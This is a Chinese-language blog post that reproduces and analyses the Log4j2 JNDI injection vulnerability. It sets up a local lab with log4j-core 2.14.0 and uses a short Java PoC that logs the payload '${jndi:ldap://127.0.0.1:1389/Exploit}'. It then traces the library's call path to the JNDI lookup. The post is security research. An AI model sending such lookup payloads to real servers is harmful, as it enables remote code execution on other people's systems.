<!DOCTYPE html><html lang="zh"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=0.5"><link rel="stylesheet" href="/css/post.css"><link rel="icon" href="/img/favicon.png"><title>log4j</title><meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism.css" type="text/css"></head><body>　　<div class="inner"><h2>log4j</h2><h1 id="0x0-Apache-Log4j2"><a href="#0x0-Apache-Log4j2" class="headerlink" title="0x0. Apache Log4j2"></a>0x0. Apache Log4j2</h1><p>Apache Log4j2 ， 简单来说是Java中的一套日志系统，用来控制如何输出、打印日志，功能很多，比如：可以定义各种格式、控制日志信息输送的目的地是控制台、文件、GUI组件，甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等，非常方便的分析、存储日志。</p>
<p>Log4j2的三大组件:</p>
<ul>
<li>Logger：日志记录器，负责收集处理日志记录</li>
<li>Appender：日志存放的地方，负责日志的输出</li>
<li>Layout：日志格式化，负责日志输出的形式</li>
</ul>
<h1 id="0x1-漏洞复现"><a href="#0x1-漏洞复现" class="headerlink" title="0x1. 漏洞复现"></a>0x1. 漏洞复现</h1><p>环境：</p>
<p>POM.xml</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre class=" language-hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.apache.logging.log4j<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>log4j-core<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>2.14.0<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name"><code class="language-hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.apache.logging.log4j<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>log4j-core<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>2.14.0<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>></span><br></code></pre></td></tr></table></figure>

<p>log4j2.xml ， 日志的配置文件</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre class=" language-hljs xml"><span class="hljs-meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">configuration</span> <span class="hljs-attr">status</span>=<span class="hljs-string">&quot;error&quot;</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">appenders</span>&gt;</span><br>        <span class="hljs-comment">&lt;!--        配置Appenders输出源为Console和输出语句SYSTEM_OUT--&gt;</span><br>        <span class="hljs-tag">&lt;<span class="hljs-name">Console</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;Console&quot;</span> <span class="hljs-attr">target</span>=<span class="hljs-string">&quot;SYSTEM_OUT&quot;</span> &gt;</span><br>            <span class="hljs-comment">&lt;!--            配置Console的模式布局--&gt;</span><br>            <span class="hljs-tag">&lt;<span class="hljs-name">PatternLayout</span> <span class="hljs-attr">pattern</span>=<span class="hljs-string">&quot;%d&#123;yyyy-MM-dd HH:mm:ss.SSS&#125; [%t] %level %logger&#123;36&#125; - %msg%n&quot;</span>/&gt;</span><br>        <span class="hljs-tag">&lt;/<span class="hljs-name">Console</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">appenders</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">loggers</span>&gt;</span><br>        <span class="hljs-tag">&lt;<span class="hljs-name">root</span> <span class="hljs-attr">level</span>=<span class="hljs-string">&quot;error&quot;</span>&gt;</span><br>            <span class="hljs-tag">&lt;<span class="hljs-name">appender-ref</span> <span class="hljs-attr">ref</span>=<span class="hljs-string">&quot;Console&quot;</span>/&gt;</span><br>        <span class="hljs-tag">&lt;/<span class="hljs-name">root</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">loggers</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name"><code class="language-hljs xml"><span class="hljs-meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">configuration</span> <span class="hljs-attr">status</span>=<span class="hljs-string">&quot;error&quot;</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">appenders</span>&gt;</span><br>        <span class="hljs-comment">&lt;!--        配置Appenders输出源为Console和输出语句SYSTEM_OUT--&gt;</span><br>        <span class="hljs-tag">&lt;<span class="hljs-name">Console</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;Console&quot;</span> <span class="hljs-attr">target</span>=<span class="hljs-string">&quot;SYSTEM_OUT&quot;</span> &gt;</span><br>            <span class="hljs-comment">&lt;!--            配置Console的模式布局--&gt;</span><br>            <span class="hljs-tag">&lt;<span class="hljs-name">PatternLayout</span> <span class="hljs-attr">pattern</span>=<span class="hljs-string">&quot;%d&#123;yyyy-MM-dd HH:mm:ss.SSS&#125; [%t] %level %logger&#123;36&#125; - %msg%n&quot;</span>/&gt;</span><br>        <span class="hljs-tag">&lt;/<span class="hljs-name">Console</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">appenders</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">loggers</span>&gt;</span><br>        <span class="hljs-tag">&lt;<span class="hljs-name">root</span> <span class="hljs-attr">level</span>=<span class="hljs-string">&quot;error&quot;</span>&gt;</span><br>            <span class="hljs-tag">&lt;<span class="hljs-name">appender-ref</span> <span class="hljs-attr">ref</span>=<span class="hljs-string">&quot;Console&quot;</span>/&gt;</span><br>        <span class="hljs-tag">&lt;/<span class="hljs-name">root</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">loggers</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">configuration</span>></span><br></code></pre></td></tr></table></figure>

<p>POC:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre class=" language-hljs java"><span class="hljs-keyword">package</span> log4j;<br><span class="hljs-keyword">import</span> org.apache.logging.log4j.LogManager;<br><span class="hljs-keyword">import</span> org.apache.logging.log4j.Logger;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">log4j</span> </span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> Logger logger = LogManager.getLogger(log4j.class);<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> </span>&#123;<br>        String a=<span class="hljs-string">&quot;$&#123;java:os&#125;&quot;</span>;<br>        logger.error(a);<br>        logger.error(<span class="hljs-string"><code class="language-hljs java"><span class="hljs-keyword">package</span> log4j;<br><span class="hljs-keyword">import</span> org.apache.logging.log4j.LogManager;<br><span class="hljs-keyword">import</span> org.apache.logging.log4j.Logger;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">log4j</span> </span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> Logger logger = LogManager.getLogger(log4j.class);<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> </span>&#123;<br>        String a=<span class="hljs-string">&quot;$&#123;java:os&#125;&quot;</span>;<br>        logger.error(a);<br>        logger.error(<span class="hljs-string">"$&#123;jndi:ldap://127.0.0.1:1389/Exploit&#125;"</span>);<br>    &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<p><img src="/2022/06/13/log4j/image-20220613171855751.png" alt="image-20220613171855751"></p>
<h1 id="0x2-漏洞分析"><a href="#0x2-漏洞分析" class="headerlink" title="0x2. 漏洞分析"></a>0x2. 漏洞分析</h1><p>Log4j2 RCE，这个洞的核心是JNDI注入，下面分析怎么走到JNDI的：</p>
<ol>
<li>从堆栈以及一些分析看，在processLogEvent之前都是一些封装、参数传递</li>
</ol>
<img src="/2022/06/13/log4j/image-20220613201104402.png" alt="image-20220613201104402" style="zoom:50%;">

<p>org.apache.logging.log4j.core.Logger#isEnabled(org.apache.logging.log4j.Level, org.apache.logging.log4j.Marker, java.lang.String, java.lang.Throwable)</p>
<p>检查日志的级别</p>
<p><img src="/2022/06/13/log4j/image-20220613205235110.png" alt="image-20220613205235110"></p>
<p>org.apache.logging.log4j.core.config.LoggerConfig#processLogEvent</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre class=" language-hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title">processLogEvent</span><span class="hljs-params">(<span class="hljs-keyword">final</span> LogEvent event, <span class="hljs-keyword">final</span> LoggerConfigPredicate predicate)</span> </span>&#123;<br>    event.setIncludeLocation(isIncludeLocation());<br>    <span class="hljs-keyword">if</span> (predicate.allow(<span class="hljs-keyword"><code class="language-hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title">processLogEvent</span><span class="hljs-params">(<span class="hljs-keyword">final</span> LogEvent event, <span class="hljs-keyword">final</span> LoggerConfigPredicate predicate)</span> </span>&#123;<br>    event.setIncludeLocation(isIncludeLocation());<br>    <span class="hljs-keyword">if</span> (predicate.allow(<span class="hljs-keyword">this</span>)) &#123;<br>        callAppenders(event);<br>    &#125;<br>    logParent(event, predicate);<br>&#125;<br></code></pre></td></tr></table></figure>

<ol start="2">
<li>根据配置文件选择appender输出的位置，</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre class=" language-hljs java"><span class="hljs-meta">@PerformanceSensitive(&quot;allocation&quot;)</span><br><span class="hljs-function"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">void</span> <span class="hljs-title">callAppenders</span><span class="hljs-params">(<span class="hljs-keyword">final</span> LogEvent event)</span> </span>&#123;<br>    <span class="hljs-keyword">final</span> AppenderControl[] controls = appenders.get();<br>    <span class="hljs-comment">//noinspection ForLoopReplaceableByForEach</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number"><code class="language-hljs java"><span class="hljs-meta">@PerformanceSensitive(&quot;allocation&quot;)</span><br><span class="hljs-function"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">void</span> <span class="hljs-title">callAppenders</span><span class="hljs-params">(<span class="hljs-keyword">final</span> LogEvent event)</span> </span>&#123;<br>    <span class="hljs-keyword">final</span> AppenderControl[] controls = appenders.get();<br>    <span class="hljs-comment">//noinspection ForLoopReplaceableByForEach</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i < controls.length; i++) &#123;<br>        controls[i].callAppender(event);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="/2022/06/13/log4j/image-20220613202920261.png" alt="image-20220613202920261"></p>
<ol start="3">
<li>根据配置文件中的layout选择如何格式化，并且进行编码输出至指定的地方，这里是Console</li>
</ol>
<p>org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender#tryAppend</p>
<p><img src="/2022/06/13/log4j/image-20220613203111297.png" alt="image-20220613203111297"></p>
<p>解析字符串</p>
<p><img src="/2022/06/13/log4j/image-20220613204816752.png" alt="image-20220613204816752"></p>
<p>对数据进行匹配</p>
<p><img src="/2022/06/13/log4j/image-20220613210841886.png" alt="image-20220613210841886"></p>
<ol start="4">
<li>根据字符串中的内容是否存在特殊字符，判断是否存在特殊字符</li>
</ol>
<p><img src="/2022/06/13/log4j/image-20220613210949360.png" alt="image-20220613210949360"></p>
<p>根据prefix选择Lookup，下面就是JNDI了</p>
<p><img src="/2022/06/13/log4j/image-20220613185308720.png" alt="image-20220613185308720"></p>
<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://paper.seebug.org/1786/">https://paper.seebug.org/1786/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/263325#h2-3">https://www.anquanke.com/post/id/263325#h2-3</a></p>
</div><script src="/js/jquery.min.js"></script><script src="/js/main.js"></script></body></html>